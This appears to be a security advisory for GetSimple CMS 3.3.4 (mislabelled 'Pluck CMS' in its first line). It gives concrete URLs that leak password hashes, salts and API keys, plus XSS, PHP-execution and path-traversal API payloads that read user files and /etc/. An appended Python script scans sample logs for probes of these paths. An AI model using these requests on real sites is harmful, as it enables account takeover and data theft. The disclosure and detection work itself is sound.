Pluck CMS: http://get-simple.info/
Version: 3.3.4
By Ross Marks: http://www.rossmarks.co.uk
OSVDB Creditee: http://osvdb.org/creditees/13991-ross-marks

1. SHA1 password (and other sensitive information) disclosure

If you know the name of a user, visit either:

http://website.com/GetSimpleCMS/data/users/.xml              <-- password
http://website.com/GetSimpleCMS/backups/users/.xml.bak       <-- password
http://website.com/GetSimpleCMS/data/other/authorization.xml <-- for salt
http://website.com/GetSimpleCMS/data/other/appid.xml         <-- API key

2. Persistent XSS (requires access)

Title, Tags, Menu Text and Meta description are all vulnerable to XSS, i.e. ">

Page content is also vulnerable by clicking the source button and editing it directly, i.e.

3. PHP code execution (requires access)

Directly type PHP at:

http://website.com/GetSimpleCMS/admin/theme-edit.php

4. Full Path Disclosure

Visit:

http://website.com/GetSimpleCMS/plugins/anonymous_data.php

to get:

Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/anonymous_data.php on line 14

or

http://website.com/GetSimpleCMS/plugins/InnovationPlugin.php

to get:

Notice: Use of undefined constant GSDATAOTHERPATH - assumed 'GSDATAOTHERPATH' in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 12
Fatal error: Call to undefined function i18n_merge() in /path/to/GetSimpleCMS/plugins/InnovationPlugin.php on line 15

5. API Vulnerabilities

Since the API key can be read (see 1), exploiting the site through the API is fairly trivial. Here are some examples (all POST data) to:

http://website.com/GetSimpleCMS/admin/api.php

1. Discover usernames:

data= ABC123456 all_files_read ../../data/users/

2. Read user settings file (includes password hash):

data= ABC123456 page_read ../../data/users/!!USERNAME!!

3. Local file inclusion:

data= ABC123456 all_files_read ../../../../../../etc/
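Every issue above except the authenticated ones leaves a trace in the web server access log: a successful request for a file under data/ or backups/, a direct load of a plugin file, or a POST to admin/api.php from an unexpected client. The following script is an added example, not part of this advisory, that scans Apache combined-format log lines for those paths so an administrator can check whether an install has been probed; the log lines are constructed for the example and the path patterns are taken from the advisory.

```python
import re
from collections import Counter

# Constructed Apache combined-format log lines (sample data, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] "GET /GetSimpleCMS/data/users/admin.xml HTTP/1.1" 200 812 "-" "curl/7.38"
203.0.113.5 - - [10/Oct/2014:13:55:37 +0000] "GET /GetSimpleCMS/data/other/authorization.xml HTTP/1.1" 200 210 "-" "curl/7.38"
198.51.100.7 - - [10/Oct/2014:13:56:01 +0000] "GET /GetSimpleCMS/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2014:13:57:12 +0000] "POST /GetSimpleCMS/admin/api.php HTTP/1.1" 200 95 "-" "python-requests/2.4"
198.51.100.7 - - [10/Oct/2014:13:58:40 +0000] "GET /GetSimpleCMS/plugins/anonymous_data.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2014:14:01:02 +0000] "GET /GetSimpleCMS/backups/users/admin.xml.bak HTTP/1.1" 403 199 "-" "curl/7.38"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path patterns named in the advisory (sections 1, 4 and 5).
SENSITIVE = [
    ("data/users/*.xml (password hash)", re.compile(r"/data/users/[^/]+\.xml$")),
    ("backups/users/*.xml.bak (password hash)", re.compile(r"/backups/users/[^/]+\.xml\.bak$")),
    ("data/other/authorization.xml (salt)", re.compile(r"/data/other/authorization\.xml$")),
    ("data/other/appid.xml (API key)", re.compile(r"/data/other/appid\.xml$")),
    ("plugins/*.php direct load (path disclosure)", re.compile(r"/plugins/[^/]+\.php$")),
    ("admin/api.php (API call)", re.compile(r"/admin/api\.php$")),
]

def classify(path):
    """Return the advisory label matching the request path, or None."""
    bare = path.split("?", 1)[0]
    for label, rx in SENSITIVE:
        if rx.search(bare):
            return label
    return None

def scan(log_text):
    """Return (ip, method, status, label, path) for every request to a sensitive path.
    A 2xx status means the file was actually served; 403/404 means a deny rule held."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        label = classify(m["path"])
        if label:
            hits.append((m["ip"], m["method"], m["status"], label, m["path"]))
    return hits

def served(hits):
    """Count successful (2xx) hits per (ip, label): the ones that disclosed data."""
    return Counter((ip, label) for ip, _, st, label, _ in hits if st.startswith("2"))

if __name__ == "__main__":
    for ip, method, status, label, path in scan(SAMPLE_LOG):
        print(f"{ip} {method} {status} {label}: {path}")
```

Requests that show up with a 2xx status for data/ or backups/ paths mean the web server is serving those directories and they should be denied at the server level; 403 entries show a deny rule working.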